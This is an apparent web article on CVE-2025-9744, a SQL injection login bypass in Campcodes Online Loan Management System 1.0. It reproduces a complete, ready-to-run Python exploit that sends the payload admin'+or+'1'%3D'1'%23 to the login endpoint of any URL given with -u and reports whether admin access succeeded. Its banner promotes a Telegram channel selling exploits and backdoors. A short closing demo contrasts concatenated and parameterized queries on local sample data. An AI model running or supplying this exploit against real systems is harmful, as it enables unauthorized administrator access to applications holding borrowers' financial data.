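This article analyzes in detail the SQL injection vulnerability CVE-2025-9744 in version 1.0 of the Campcodes Online Loan Management System. It includes a complete Python exploit implementation that bypasses authentication by constructing a malicious SQL statement. The CVSS score is as high as 9.8.
Campcodes Online Loan Management System 1.0 SQL Injection Exploit CVE-2025-9744
Vulnerability Information
- Discovery date: 2025-10-21
- CVSS score: 9.8
- CVE ID: CVE-2025-9744
- Affected versions: <= 1.0.0
- Tested on: Windows
Vulnerability Details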
```python
# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10
from __future__ import print_function
import requests
import sys

banner = '''
-#-
bY t.me/uncodeboss
CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection
[Notification] : Become a VP user and get all the exploits and tools,
backdoors
t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw
[Usage] :
python CVE-2025-9744.py -u http/https or just example.com.
'''

# Silence the TLS warnings caused by verify=False below.
try:
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass


def codeb0ssexp(codeb0ss_base):
    # Default to http:// when no scheme is given.
    if not codeb0ss_base.startswith("http://") and not codeb0ss_base.startswith("https://"):
        codeb0ss_base = "http://" + codeb0ss_base
    base_url = codeb0ss_base.rstrip("/")
    # A session keeps the cookie set by the login request for the follow-up GET.
    cdb0s = requests.Session()
    cdb0s.headers.update({
        'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    })
    red = "\033[91m"
    green = "\033[92m"
    post_path = "/ajax.php?action=login"
    get_path = "/index.php?page=home"
    post_url = base_url + post_path
    get_url = base_url + get_path
    # Pre-encoded form body; the username field carries the injection.
    username = "admin'+or+'1'%3D'1'%23"
    password = "expbycodeb0ss"
    payload = "username={}&password={}".format(username, password)
    try:
        r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
        r_get = cdb0s.get(get_url, timeout=10, verify=False)
        try:
            combined = (r_post.text or "") + (r_get.text or "")
        except Exception:
            combined = (r_post.content or "") + (r_get.content or "")
        # Keyword check on the combined responses decides the verdict.
        group1 = ["window.start_load", "Welcome back Admin", "Loan Management System"]
        group1_ok = all(w in combined for w in group1)
        group2_ok = ("login-form" in combined)
        if group1_ok and group2_ok:
            print(" - " + base_url + " --> " + green + "Vulnerable")
            print(" - {}".format(post_url))
            print(" - {}".format(get_url))
            return 0
        else:
            print(" - " + base_url + " --> " + red + "Not_Vulnerable")
            return 2
    except requests.exceptions.RequestException as e:
        print(" - " + base_url + " --> " + red + "Time0ut")
        return 1


def startexp():
    # Return the value following -u on the command line, if any.
    if '-u' in sys.argv:
        idx = sys.argv.index('-u')
        if idx + 1 < len(sys.argv):
            return sys.argv[idx + 1]
    return None


def main():
    print(banner)
    target = startexp()
    if not target:
        sys.exit(1)
    rc = codeb0ssexp(target)
    sys.exit(rc)


if __name__ == "__main__":
    main()
```
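Technical Highlights
The exploit script bypasses the authentication mechanism of the Campcodes Online Loan Management System by constructing a specific SQL injection payload. Its main technical characteristics are:
- Injection point: the username parameter of the /ajax.php?action=login endpoint
- Injection payload: admin'+or+'1'%3D'1'%23, which produces an always-true condition to bypass the check
- Request method: the malicious payload is sent in a POST request
- Verification: success is judged by checking the response content for specific keywords
- Session management: requests.Session is used to maintain session state
This vulnerability allows an attacker to gain administrator access without valid credentials, making it a high-severity security vulnerability.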
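
The login bypass described above comes down to how the server builds its SQL. The following is an added example, not code from the original page or from Campcodes: it decodes the exact request body the script sends and runs it against an assumed login query in an in-memory SQLite table, first concatenated and then parameterized. The table layout, the plaintext password column, the query shape, and the mapping of MySQL's `#` comment to SQLite's `--` are assumptions made for the demonstration.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body exactly as the script on this page sends it.
BODY = "username=admin'+or+'1'%3D'1'%23&password=expbycodeb0ss"

def decode_form(body):
    """Decode the urlencoded body the way a web server would."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields["username"][0], fields["password"][0]

def make_db():
    # Constructed sample data; the real schema is not shown on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-secret')")
    return db

def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: input is pasted into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    # MySQL treats '#' as a comment start; SQLite uses '--', so map it for the demo.
    sql = sql.replace("#", "--")
    return sql, db.execute(sql).fetchone()

def login_parameterized(db, username, password):
    """Hardened pattern: values are bound, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    user, pw = decode_form(BODY)
    print("decoded username:", user)
    sql, row = login_concatenated(db, user, pw)
    print("concatenated SQL:", sql)
    print("concatenated result:", row)
    print("parameterized result:", login_parameterized(db, user, pw))
```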